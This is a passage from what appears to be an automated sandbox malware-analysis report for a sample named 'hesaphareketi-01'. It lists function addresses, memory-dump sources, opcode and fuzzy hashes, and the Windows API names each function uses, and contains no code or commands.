                                                  • Instruction Fuzzy Hash: 4B32F432F09B45A6EB18DF66D4842ACA7F2AB04788F804136CE0DB7798DE39E455D361
                                                  Function 00007FF7341EFDA0 Relevance: .4, Instructions: 432COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567bd8c800cafad585b7cf90b26b86391f749c9adea7eec1786a4c820cec952b
                                                  • Instruction ID: f0affa4e1a327dbc150a6ad7330c03870f245c902c8f611913c667e3edc106dd
                                                  • Opcode Fuzzy Hash: 567bd8c800cafad585b7cf90b26b86391f749c9adea7eec1786a4c820cec952b
                                                  • Instruction Fuzzy Hash: 7D02B272B05E42A6EB589F5AE480678B790AB41BA4FC44335DB2E977D5CF3CE441E320
                                                  Function 00007FF7341F69D0 Relevance: .4, Instructions: 415COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae9fc67e00198cb791d6b42d7e224a19ac5270105391cad9a71a2955a2d292d9
                                                  • Instruction ID: 3f355bca40b6cc608148b3b5d70ba25b5017a41fbc1ab9d531b466e3f32117a3
                                                  • Opcode Fuzzy Hash: ae9fc67e00198cb791d6b42d7e224a19ac5270105391cad9a71a2955a2d292d9
                                                  • Instruction Fuzzy Hash: A5F10822F26B4D51E91A9A3761813B8D7915F6A7C0E5CCB36E94D76770EF3CB083A210
                                                  Function 00007FF7341F4890 Relevance: .4, Instructions: 361COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a30e9ccede4defc8cb9bb7021f2aed867e6faa058a659ec2196f15f4e69dc293
                                                  • Instruction ID: a8be3322c8e28839b23d93c306ef927016899d1ab7723c3b92b799b04dcca90e
                                                  • Opcode Fuzzy Hash: a30e9ccede4defc8cb9bb7021f2aed867e6faa058a659ec2196f15f4e69dc293
                                                  • Instruction Fuzzy Hash: 18F1F272B09F8592EB189F26A484278A3A0FB55BA4F945331CF6D57791DF3CE082E310
                                                  Function 00007FF7341EF7F4 Relevance: .4, Instructions: 357COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CounterPerformanceQuery
                                                  • String ID:
                                                  • API String ID: 2783962273-0
                                                  • Opcode ID: c1850e810df6202e2c71cd3c6d27a795553a239f11018daae015bd6db6a2eabd
                                                  • Instruction ID: 4b4ff88a9ed8d4b61f07d42f69d4740d8403e8455c58fa38593a7ae350d54019
                                                  • Opcode Fuzzy Hash: c1850e810df6202e2c71cd3c6d27a795553a239f11018daae015bd6db6a2eabd
                                                  • Instruction Fuzzy Hash: F402E726A19F4671EE59EF26A4D0334A7A0BF49784FA44239DD4DA33A0DF3DE481D224
                                                  Function 00007FF7342089D0 Relevance: .3, Instructions: 332COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a067f801db91a70f563a5d40447dd11d047fed665657b512b0d6a88a55159cf1
                                                  • Instruction ID: cd6009f9a3c2cd7f1c96d56a0886c9c5a5c53e4533abd88a52e28faec612bc26
                                                  • Opcode Fuzzy Hash: a067f801db91a70f563a5d40447dd11d047fed665657b512b0d6a88a55159cf1
                                                  • Instruction Fuzzy Hash: 77E1C272A08B45A6EB59AF26D484379B7E1FB45B80F80423AC94DE3390DF3DE445E712
                                                  Function 00007FF7341F2934 Relevance: .3, Instructions: 327COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d93270e60e16491fbe54944405fcef5222b15305876aeadfc7a3f6476fd23a8
                                                  • Instruction ID: 0704fd0ff0ea45c639977fe5d9a765b551556945cf8edb0c334f8a52e5d24956
                                                  • Opcode Fuzzy Hash: 2d93270e60e16491fbe54944405fcef5222b15305876aeadfc7a3f6476fd23a8
                                                  • Instruction Fuzzy Hash: E1E10623A1BFC555E51BEF36A091375E398AF567C0F848332DE4F72662DF2961839210
                                                  Function 00007FF7341F88C0 Relevance: .3, Instructions: 273COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4edf0397d65345d120d8a261b0ef52faea315b51b514a397b6118f37b68e7496
                                                  • Instruction ID: d6f859fe881199a3224c01121fbf0049257bff26ac6717046641028a1ddee733
                                                  • Opcode Fuzzy Hash: 4edf0397d65345d120d8a261b0ef52faea315b51b514a397b6118f37b68e7496
                                                  • Instruction Fuzzy Hash: D5C19532A19A46A1EE58AF07F8D0278B7A0FF46B90F844235CA6D93794DF7CE451E314
                                                  Function 00007FF734202290 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f81cb8a8fa680b7983bac6cb0d1cb7bd7e58e6fd297d06bcd676f255ee82a72e
                                                  • Instruction ID: 5e0da08d0122df8ef1c3b4bb6a378f5e230c3848befed510a759d828eae09902
                                                  • Opcode Fuzzy Hash: f81cb8a8fa680b7983bac6cb0d1cb7bd7e58e6fd297d06bcd676f255ee82a72e
                                                  • Instruction Fuzzy Hash: FEC17432A08B46A2DE58EF07E8D4178B7A5FB46790B840136D95DE77A4CF3DE850E321
                                                  Function 00007FF7341F57F0 Relevance: .3, Instructions: 251COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a88597bd80fbec51528b2ed85b6bd883d763db581cbee44f11464c4b77c7b693
                                                  • Instruction ID: d38225d4a3fd494e6e56e924e92ae40456c4534e7c45ddd29f2dde224e0d6a0d
                                                  • Opcode Fuzzy Hash: a88597bd80fbec51528b2ed85b6bd883d763db581cbee44f11464c4b77c7b693
                                                  • Instruction Fuzzy Hash: 9A913672B15A9593DB588F0AE4806A87BA2F785BC0F854139DB4ED7B09DF3CD805DB10
                                                  Function 00007FF7341F8D40 Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 437c2bb9eed3bb237656b73319d9a7c63277ab8907db6804528c2f463d4bd837
                                                  • Instruction ID: f2611abccf74043bac6868b1a193a98daec546572f8be02cc03bae415d30e0eb
                                                  • Opcode Fuzzy Hash: 437c2bb9eed3bb237656b73319d9a7c63277ab8907db6804528c2f463d4bd837
                                                  • Instruction Fuzzy Hash: EF512B12F5BF0D11E90E9B3B6181679C1825F5A7C0E9CCB31DA0E72791EF7DB092A110
                                                  Function 00007FF7341F3010 Relevance: .2, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd315fed3be031c9e26a90a11914652993b972776a13770548698b9b4cb4de5d
                                                  • Instruction ID: 9f92853b34f2199f1b8d433816e6705571043b61b87492f21dcd302e9a1ce060
                                                  • Opcode Fuzzy Hash: dd315fed3be031c9e26a90a11914652993b972776a13770548698b9b4cb4de5d
                                                  • Instruction Fuzzy Hash: C8613832E19F8955DA1EDF26A4C1928E39ABF457C0B949335DE0FA3251DF3CA092D610
                                                  Function 00007FF7341FF360 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: 1fa7a848999a6a82e6943152a9856c355e6e1e90088799d98739f212ba5528bb
                                                  • Instruction ID: 89f1ca8f88a19968f1302c81f8992887b6fdbfacee4c00419c5013dd5a4cb25e
                                                  • Opcode Fuzzy Hash: 1fa7a848999a6a82e6943152a9856c355e6e1e90088799d98739f212ba5528bb
                                                  • Instruction Fuzzy Hash: B821D822B2CA4262EF9CAF37B2D167D53D0DB89794FC42231DF5C83A95DD18D5839600
                                                  Function 00007FF7341ED9F0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 227threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID: X@2
                                                  • API String ID: 115865932-2772482207
                                                  • Opcode ID: 8855a6a9be19cc912e040998a95c185b2b15f028c0bb56cd1e5e4913b5d84e9d
                                                  • Instruction ID: 42e9128d08732e2c81f41352d331b4fcd9c249439b5d7ffc607aef82cbb58b46
                                                  • Opcode Fuzzy Hash: 8855a6a9be19cc912e040998a95c185b2b15f028c0bb56cd1e5e4913b5d84e9d
                                                  • Instruction Fuzzy Hash: 61A15F3AE0C94367FA6CBF27B8C0675A291AF46754F840139D85DD36D1DE3DB880B628
                                                  Function 00007FF7341DA990 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                  • String ID: InitializeContext2$kernel32.dll
                                                  • API String ID: 4102459504-3117029998
                                                  • Opcode ID: edabfeb27e12de1ac58e4de23520e38ce78f3386a9e832e640fcf79b6a971462
                                                  • Instruction ID: 650230c56ccf75286944b63513d337358b99ed5c8ccc2cab28ec2ea6b94bf1c1
                                                  • Opcode Fuzzy Hash: edabfeb27e12de1ac58e4de23520e38ce78f3386a9e832e640fcf79b6a971462
                                                  • Instruction Fuzzy Hash: 97318362A09B56A1FE08EF56B980279E3A0EF45BD0F840435DD4D937A4DF7CE446D720
                                                  Function 00007FF7341D5D00 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                                                  • String ID: QueueUserAPC2$kernel32
                                                  • API String ID: 3714266957-4022151419
                                                  • Opcode ID: 1854c6662005a05bccb6cd86df4f5362b47cb18156353affd7ed6c801de71de6
                                                  • Instruction ID: ddbfc9b948aa187294029b4fb9b2d2b683755e430dcd5811faaac888a36942d8
                                                  • Opcode Fuzzy Hash: 1854c6662005a05bccb6cd86df4f5362b47cb18156353affd7ed6c801de71de6
                                                  • Instruction Fuzzy Hash: 54317F62A08E4261EE58FF1BB8C4379A361EF46BE4F800234D85ED76E4DF3CE4019660
                                                  Function 00007FF7341F2240 Relevance: 10.6, APIs: 7, Instructions: 134threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$CriticalSectionSwitch$Leave$CurrentEnter
                                                  • String ID:
                                                  • API String ID: 2584832284-0
                                                  • Opcode ID: 911a7cc94664f48a14bb56dfd2eba76f0f521efe915744327b0e3e75a7d93955
                                                  • Instruction ID: 85a8ebe1bd25ee9dd0ac4f1890b6fb7a16dce1295d9b9fc1a1d8737f1d5f651e
                                                  • Opcode Fuzzy Hash: 911a7cc94664f48a14bb56dfd2eba76f0f521efe915744327b0e3e75a7d93955
                                                  • Instruction Fuzzy Hash: DE513E61E0D913B6FA1CBF27B8C1575E291AF49700FC00239E55DD3292CE3DB842AA72
                                                  Function 00007FF7341D6100 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                  • String ID:
                                                  • API String ID: 510365852-3916222277
                                                  • Opcode ID: fabd27e107bbfd348c5fcb363ee42fc01df79ff2f7dd51d048f6b6b90d90cb7c
                                                  • Instruction ID: 8f73d5e803eeb54d74bf7d42bdf2b82d285dc04d4c335ea7495920106353b528
                                                  • Opcode Fuzzy Hash: fabd27e107bbfd348c5fcb363ee42fc01df79ff2f7dd51d048f6b6b90d90cb7c
                                                  • Instruction Fuzzy Hash: B311B372608B818AD754FF16B44019AB3A1FB457B8F440335EABD4B7D6CF39D4418700
                                                  Function 00007FF7341FD410 Relevance: 9.2, APIs: 6, Instructions: 189threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
